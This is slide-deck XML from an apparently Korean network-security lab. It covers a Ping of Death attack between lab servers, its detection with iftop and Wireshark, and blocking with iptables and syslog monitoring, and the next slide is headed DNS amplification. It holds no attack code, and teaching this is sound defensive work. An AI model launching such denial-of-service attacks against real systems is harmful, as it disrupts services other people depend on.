              <a:t>공격서버에서 희생자서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ping of Death </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격시도</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 트래픽 양 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>희생자서버에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷 분석</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷을 분석해보면 패킷이 너무 커서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>여러개로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 분할된 것 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- ICMP Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷 분석</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>헤더 분석 후 페이로드 크기 값 확인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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>( TX : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>전송 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ RX : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ TOTAL : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>전체 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cumm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 후 현재까지의 총 데이터 양 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ peak : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>피크시의 데이터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ rates : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>각각 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>초</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>초</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>초의 평균흐름 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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8193" name="_x247860040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A40277F5-C572-4F58-BE6E-FEC242BB57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180" y="731520"/>
            <a:ext cx="5400675" cy="1444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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{822884C2-FCB7-47B3-9010-2F92A75623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pic>
        <p:nvPicPr>
          <p:cNvPr id="8195" name="_x247862040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A32AC6-4452-49F0-9A6E-7C4AA6CC76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1036" y="896112"/>
            <a:ext cx="2003425" cy="19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7" name="_x247863320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14467215-CB03-4782-97E3-9A1EB557CD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1146" y="1207008"/>
            <a:ext cx="5400675" cy="3059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10633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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ipv4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷으로 쪼개져 들어오는 것을 확인 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Reassembled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>확인</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> restart</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 4) /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 수정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/iptables</a:t>
            </a:r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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 5) iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수정한 값을 적용하기 위해 서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service iptables restart </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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9217" name="_x247861160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A30B93-8357-4639-9D22-964A379AD6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832" y="926592"/>
            <a:ext cx="5400675" cy="3438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9" name="_x247863080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FAF6D21-0ED9-4F74-B7FB-B448FE8BAB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568" y="5202426"/>
            <a:ext cx="5295900" cy="449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1" name="_x247863080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6642B922-BA29-46C1-B6B0-D6A5B52AA2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1146" y="926592"/>
            <a:ext cx="5400675" cy="3646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3" name="_x247862600">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC26899-603C-4414-A161-2D1F5F8255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7674" y="5180201"/>
            <a:ext cx="5326063" cy="350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54055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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="3690938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ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>6) tail -f /var/log/message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령으로 실시간으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DROP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>되는 로그 확인</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392121" y="4248284"/>
            <a:ext cx="5616792" cy="2209606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en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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241" name="_x247862680">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABD08CA-E4CF-4213-AC0C-80AE18A3DC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180" y="688848"/>
            <a:ext cx="5400675" cy="308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3" name="_x247862680">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99397CCC-E732-4B75-AAAA-C1D6A16E48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390" y="4645152"/>
            <a:ext cx="3260725" cy="392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67998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E60E50-7DA3-41F4-B92E-B8A0C30C5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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Theory/T32 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 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DNS 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증폭 공격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(DNS Amplification)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="화살표: 오른쪽 6">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC876A3B-2146-4C09-A591-885C34BCB344}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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DCD5C6C-58D3-48F4-93FF-AAD76C081B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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717396D8-C5C9-4505-A138-9C88EFABF131}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
